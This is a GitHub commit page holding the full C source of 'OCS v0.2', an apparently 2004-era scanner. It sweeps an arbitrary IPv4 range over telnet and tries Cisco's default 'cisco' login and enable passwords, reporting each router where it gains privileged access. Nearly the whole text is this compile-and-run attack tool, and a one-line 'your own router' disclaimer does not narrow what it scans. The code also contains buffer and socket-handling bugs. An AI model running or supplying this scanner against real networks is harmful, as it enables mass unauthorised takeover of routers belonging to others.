Skip to content

Commit 1f7bf46

Browse files
archeyarchey
committed
added source code for cisco-ocs
1 parent 4cf9578 commit 1f7bf46

File tree

1 file changed

+339
-0
lines changed

1 file changed

+339
-0
lines changed

OCS-0.2.c

+339
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,339 @@
1+
/*
2+
Author: OverIP
3+
Andrea Piscopiello
4+
[email protected]
5+
Source: OCS v 0.2
6+
License: GPL
7+
This program is free software; you can redistribute it and/or
8+
modify it under the terms of the GNU General Public License
9+
as published by the Free Software Foundation; either version 2
10+
of the License, or (at your option) any later version.
11+
Email: Write me for any problem or suggestion at: [email protected]
12+
Date: 09/08/2004
13+
Read me: Just compile it with:
14+
15+
gcc ocs.c -o ocs -lpthread
16+
17+
Then run it with: ./OCS xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy
18+
xxx.xxx.xxx.xxx=range start IP
19+
yyy.yyy.yyy.yyy=range end IP
20+
21+
PAY ATTENTION: This source is coded for only personal use on
22+
your own router Cisco. Don't hack around.
23+
24+
Special thanks to:
25+
Khlero with your patience this code is out there :*
26+
Shen139, without you I can't live :D
27+
people that helped betatesting this code :)
28+
Alex Kah (alex at question-defense dot com) from Question-Defense.com and his Cisco Router :)
29+
I love U all :*
30+
*/
31+
32+
33+
#include <stdio.h>
34+
#include <stdlib.h>
35+
#include <sys/types.h>
36+
#include <sys/ioctl.h>
37+
#include <fcntl.h>
38+
#include <sys/socket.h>
39+
#include <netinet/in.h>
40+
#include <unistd.h>
41+
#include <string.h>
42+
#include <signal.h>
43+
44+
45+
int i=0;
46+
int j=0;
47+
int k=0;
48+
int l=0;
49+
50+
51+
char buffer_a[700];
52+
char buffer_b[700];
53+
char buffer_c[700];
54+
char tmpIP[16];
55+
56+
pthread_t threadname;
57+
58+
59+
void callScan() // scanning
60+
{
61+
scanna(tmpIP);
62+
pthread_exit(0);
63+
}
64+
65+
66+
static void funcAlarm() //alarm
67+
{
68+
pthread_exit(0);
69+
}
70+
71+
72+
int setnonblock(int sock) //setta socket non bloccanti
73+
{
74+
struct timeval timeout;
75+
76+
timeout.tv_sec = 10;
77+
timeout.tv_usec = 0;
78+
if (setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,(char*) &timeout, sizeof(timeout)))
79+
return 0;
80+
return 1;
81+
}
82+
83+
84+
void init(struct sockaddr_in *address,int port,int IP)
85+
{
86+
address->sin_family=AF_INET;
87+
address->sin_port=htons((u_short)port);
88+
address->sin_addr.s_addr=IP;
89+
}
90+
91+
92+
int scanna(char*rangeIP) //scanning
93+
{
94+
int error;
95+
int sd;
96+
97+
struct sockaddr_in server;
98+
99+
close(sd);
100+
101+
server.sin_family=AF_INET;
102+
server.sin_port=htons(23);
103+
server.sin_addr.s_addr=inet_addr(rangeIP);
104+
105+
sd=socket(AF_INET,SOCK_STREAM,0);
106+
if(sd==-1)
107+
{
108+
printf("Socket Error(%s)\n",rangeIP);
109+
close(sd);
110+
pthread_exit(0);
111+
}
112+
113+
// setnonblock(sd);
114+
signal(SIGALRM,funcAlarm);
115+
alarm(7);
116+
fflush(stdout);
117+
118+
error=connect(sd,(struct sockaddr*)&server,sizeof(server));
119+
if(error==0)
120+
{
121+
printf("\n\n-%s\n",rangeIP);
122+
fflush(stdout);
123+
memset(buffer_c, '\0',700);
124+
recv(sd,buffer_c,700,0);
125+
printf(" |Logging... %s\n",rangeIP);
126+
fflush(stdout);
127+
memset(buffer_a, '\0',700);
128+
memset(buffer_b, '\0',700);
129+
130+
send(sd,"cisco\r",6,0);
131+
132+
sleep(1);
133+
134+
recv(sd,buffer_a,700,0);
135+
136+
if(strstr(buffer_a,"#"))
137+
printf(" |Default Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
138+
else
139+
if(strstr(buffer_a,">"))
140+
{
141+
printf(" |Default Telnet password found. %s\n",rangeIP);
142+
fflush(stdout);
143+
send(sd,"enable\r",7,0);
144+
145+
sleep(1);
146+
147+
send(sd,"cisco\r",6,0);
148+
149+
sleep(1);
150+
151+
recv(sd,buffer_b,700,0);
152+
//printf(" Sto cercando di loggarmi in enable mode\n");
153+
//fflush(stdout);
154+
}
155+
if(strstr(buffer_b,"#"))
156+
printf(" |Default Telnet and Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
157+
158+
else
159+
160+
printf(" |Router not vulnerable. \n");
161+
fflush(stdout);
162+
}
163+
else
164+
{
165+
printf("\n\n(%s) Filtered Ports\n",rangeIP);
166+
close(sd);
167+
alarm(0);
168+
signal(SIGALRM,NULL);
169+
pthread_exit(0);
170+
}
171+
172+
close(sd);
173+
fflush(stdout);
174+
alarm(0);
175+
signal(SIGALRM,NULL);
176+
pthread_exit(0);
177+
}
178+
179+
180+
char *getByte(char *IP,int index);
181+
182+
int function1(char* IP, char* IP2)
183+
{
184+
185+
char rangeIP[16];
186+
187+
pid_t pid;
188+
i=atoi(getByte(IP,1));
189+
j=atoi(getByte(IP,2));
190+
k=atoi(getByte(IP,3));
191+
l=atoi(getByte(IP,4));
192+
193+
while(1)
194+
{
195+
196+
sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
197+
strcpy(tmpIP,rangeIP);
198+
if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
199+
{
200+
printf("+ Thread error:\n");
201+
perror(" - pthread_create() ");
202+
exit(0);
203+
}
204+
fflush(stdout);
205+
pthread_join(threadname, NULL);
206+
fflush(stdout);
207+
l++;
208+
if (l==256)
209+
{
210+
l=0;
211+
k++;
212+
if (k==256)
213+
{
214+
k=0;
215+
j++;
216+
if (j==256)
217+
{
218+
j=0;
219+
i++;
220+
}
221+
}
222+
}
223+
224+
if(i==atoi(getByte(IP2,1)) && j==atoi(getByte(IP2,2)) && k==atoi(getByte(IP2,3)) && l==atoi(getByte(IP2,4)))
225+
{
226+
break;
227+
}
228+
229+
}
230+
231+
sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
232+
strcpy(tmpIP,rangeIP);
233+
fflush(stdout);
234+
if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
235+
{
236+
printf("+ Thread error:\n");
237+
perror(" - pthread_create() ");
238+
exit(0);
239+
}
240+
pthread_join(threadname, NULL);
241+
242+
fflush(stdout);
243+
}
244+
245+
246+
int main(int argc,char *argv[])
247+
{
248+
249+
int w;
250+
251+
printf("********************************* OCS v 0.2 **********************************\n");
252+
printf("**** ****\n");
253+
printf("**** coded by OverIP ****\n");
254+
printf("**** [email protected] ****\n");
255+
printf("**** under GPL License ****\n");
256+
printf("**** ****\n");
257+
printf("**** usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy ****\n");
258+
printf("**** ****\n");
259+
printf("**** xxx.xxx.xxx.xxx = range start IP ****\n");
260+
printf("**** yyy.yyy.yyy.yyy = range end IP ****\n");
261+
printf("**** ****\n");
262+
printf("******************************************************************************\n");
263+
264+
if(argc!=3)
265+
266+
{
267+
printf("use: %s IP IP\n",argv[0]);
268+
exit(-1);
269+
}
270+
271+
for(w=1;w<=5;w++)
272+
if(atoi(getByte(argv[1],w))>255 || atoi(getByte(argv[2],w))>255)
273+
{
274+
printf("use: ./OCS IP IP\n");
275+
exit (-1);
276+
}
277+
278+
279+
for(w=1;w<=5;w++)
280+
if(atoi(getByte(argv[1],w))<atoi(getByte(argv[2],w)))
281+
{
282+
function1(argv[1],argv[2]);
283+
return 0;
284+
}
285+
286+
else if(atoi(getByte(argv[1],w))>atoi(getByte(argv[2],w)))
287+
{
288+
printf("use: %s IP IP\n",argv[0]);
289+
return 0;
290+
}
291+
292+
293+
printf("Same IPs \n");
294+
fflush(stdout);
295+
scanna(argv[1]);
296+
return 0;
297+
}
298+
299+
300+
char *getByte(char *IP,int index)
301+
{
302+
303+
int i=0;
304+
int separator=0;
305+
static char byte[3];
306+
307+
for(i=0;i<4;i++)
308+
byte[i]='\0';
309+
memset(byte,0,sizeof(byte));
310+
311+
for(i=0;i<strlen(IP);i++)
312+
{
313+
314+
if((IP[i]=='.') && (separator==index-1))
315+
316+
{
317+
return byte;
318+
}
319+
320+
else
321+
if(IP[i]=='.')
322+
323+
{
324+
separator++;
325+
}
326+
327+
else
328+
if (separator==index-1)
329+
330+
{
331+
strncat(byte,&IP[i],1);
332+
}
333+
334+
}
335+
336+
return byte;
337+
}
338+
339+

0 commit comments

Comments
 (0)